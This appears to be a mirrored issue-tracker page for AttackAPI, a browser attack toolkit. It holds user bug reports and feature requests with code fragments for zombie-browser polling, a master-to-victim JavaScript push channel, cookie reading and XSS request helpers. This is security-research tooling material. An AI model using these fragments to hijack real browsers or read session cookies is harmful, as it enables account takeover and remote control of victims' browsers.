tinda / attackapi Goto Github PK
View Code? Open in Web Editor NEWAutomatically exported from code.google.com/p/attackapi
Automatically exported from code.google.com/p/attackapi
Reading the code:
AttackAPI.encodeURL = function (u) {
return escape(url);
};
url should be u.
Original issue reported on code.google.com by [email protected]
on 6 Jan 2008 at 6:19
make a function hijackVar for logging everytime a variable's content is
accessed.
code:
AttackAPI.dom.hijackVar = function (varo,callback) {
if(varo.hijacked)return varo;
var varn=Object();
varn.original=varo;
varn.valueOf=varn.toSource=varn.toString=function () {
if(callback)callback();
return this.original;
};
};
Original issue reported on code.google.com by sirdarckcat
on 12 Aug 2007 at 6:49
There are no downloads under the Downloads tab, neither at
http://www.gnucitizen.org/blog/attackapi/
Original issue reported on code.google.com by [email protected]
on 9 Feb 2013 at 11:36
There are a couple of things that needs to be fixed in the next version of
MasterAPI.
1. The console has to work with Opera, IE6, IE7 and Firefox
2. The shell has to work with Opera, IE6, IE7 and Firefox
- fix the "eval" and "with" statements
- the shell needs to create a insatance of a shell object and return that
to the developer for further use
Original issue reported on code.google.com by pdp.gnucitizen
on 20 Oct 2006 at 4:19
What steps will reproduce the problem?
1. in one browser, let's say IE, create a zombie, extend with an onpull
function and start it. (victim)
2. in another browser, say FF, create another zombie, list victim zombies,
and send a message via push("alert(1)", "GLOBAL")
What is the expected output? What do you see instead?
I should see the "alert(1)" message at the victim's onpull function.
What version of the product are you using? On what operating system?
2.2.0a, XPSP2
Please provide any additional information below.
should I have sent an email instead I don't know. Anyways here it goes;
In AttackAPI 2.2.0a, in "AttackAPI.dom.spawnChannel" method, there are
"transport" and "evaluate" functions. These functions send "referrer" query
parameters.
With these in hand, a master (yet another zombie, in fact) can't push
messages to clients, since clients fetch their corresponding messages
indexed via their referrers:
array_shift($_SESSION['_message_queue'][$REFERRER])
Actually I didn't try hard to understand but what do you use referrers for?
My patch was to do this;
function transport(query) {
AttackAPI.core.extend(query, {
/*referrer: channel.referrer,*/
__r: Math.random() + '_' + new Date().getTime()});
AttackAPI.dom.transport({url: channel.location, query: query});
}
same with the evaluate function...
Original issue reported on code.google.com by [email protected]
on 2 May 2007 at 12:35
add support for various types of data urls
DataURLEncoder --> for the data: schema
JavaScriptDataURLEncoder --> for the javascript: schema
Original issue reported on code.google.com by pdp.gnucitizen
on 20 Oct 2006 at 3:00
Code:
AttackAPI.dom.zombiefyL = function (url, interval) {
var interval = (interval == 'undefined')?interval:2000;
window.setInterval(function () {
AttackAPI.dom.requestJSL(url + '?action=pull');
}, interval);
};
What is the expected output? What do you see instead?
Shouldn't it be:
var interval = (interval != 'undefined')?interval:2000;
Please provide any additional information below.
Original issue reported on code.google.com by sirdarckcat
on 12 Aug 2007 at 6:45
* support for groups
* support for RSS output
* support for targets
* support for dynamic client names
* support for multi-client requests
Original issue reported on code.google.com by pdp.gnucitizen
on 20 Oct 2006 at 3:03
This is a trivial one;
What steps will reproduce the problem?
1.
with document.cookie is equal to PHPSESSID=9b243572455a4d62683de5dd8544da1e
a javascript line like below
myCookieVal = AttackAPI.dom.getCookie("PHPSESSID");
What is the expected output? What do you see instead?
expected output:
myCookieVal = 9b243572455a4d62683de5dd8544da1e
instead;
myCookieVal = null
What version of the product are you using? On what operating system?
2.2.0a, XPPro_SP2, IE6
Please provide any additional information below.
lines in getCookie function
if (cookie == unescape(pair.substring(0, name.length)))
return unescape(pair.substring(name.length + 1));
might be changed to
if (cookie == unescape(pair.substring(0, cookie.length)))
return unescape(pair.substring(cookie.length + 1));
Original issue reported on code.google.com by [email protected]
on 7 May 2007 at 4:13
the building system should export the project wiki into the doc/ through
google's subversion and integrate it withing the document generation
application. wiki parser is required!
Original issue reported on code.google.com by pdp.gnucitizen
on 1 Dec 2007 at 1:04
What steps will reproduce the problem?
1. function dom.spawnSandbox(data) doens't return the sandbox with my data
as parameter.
What is the expected output? What do you see instead?
AttackAPI.dom.spawnSandbox( { myfn: function() { alert('hi'); } }
).scope.myfn();
spawnSandbox should return sandbox object with myfn extended in scope
object, but it doesn't.
What version of the product are you using? On what operating system?
2.2.0a - XP SP2
Please provide any additional information below.
this is the original piece of code:
AttackAPI.dom.spawnSandbox = function (data) {
...
...
ifr.onload = function ()
{
laded = true;
AttackAPI.core.extend(ifr.contentWindow, data);
for (var i = 0; i < queue.length; i++)
sandbox.evaluate(queue[i]);
};
return sandbox;
}
END
i resolved extending the ifr.contentWindow before the ifr.onload function:
AttackAPI.dom.spawnSandbox = function (data) {
...
...
AttackAPI.core.extend(ifr.contentWindow, data);
ifr.onload = function () {
loaded = true;
for (var i = 0; i < queue.length; i++)
sandbox.evaluate(queue[i]);
};
return sandbox;
}
END
Original issue reported on code.google.com by [email protected]
on 26 Jun 2007 at 2:54
What steps will reproduce the problem?
1. Load AttackAPI
2. In Firebug, type
var b = new Object();
b.url = 'http://www.google.com/'
b.onload = function(d, r) { alert('foo'); alert(d['data']); alert(r.url); };
AttackAPI.dom.requestXSS(b);
What is the expected output? What do you see instead?
I expect to see a popup with foo, a popup with some data and a popup with
http://www.google.com/
Instead, I see a popup with foo, a popup with null and a popup with
http://www.google.com/
What version of the product are you using? On what operating system?
Tested with version 2.2.0a in Firefox on Freebsd
Please provide any additional information below.
Maybe I didn't understand the purpose of the requestXSS function, there is
no documentation for it.
Original issue reported on code.google.com by [email protected]
on 5 Sep 2007 at 7:15
What steps will reproduce the problem?
1. any AttackAPI function call that creates an iframe assigning an onload
function.
let's take requestXSS, for instance.
What is the expected output? What do you see instead?
IE won't call the dynamically assigned onload function.
What version of the product are you using? On what operating system?
Please provide any additional information below.
We may have to use smt. like below;
...
if(AttackAPI.dom.getAgent() == 'msie'){
ifr.onreadystatechange = function(){
if(ifr.readyState=="complete"){
// ...
}
};
}
...
Original issue reported on code.google.com by [email protected]
on 17 Aug 2007 at 1:42
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.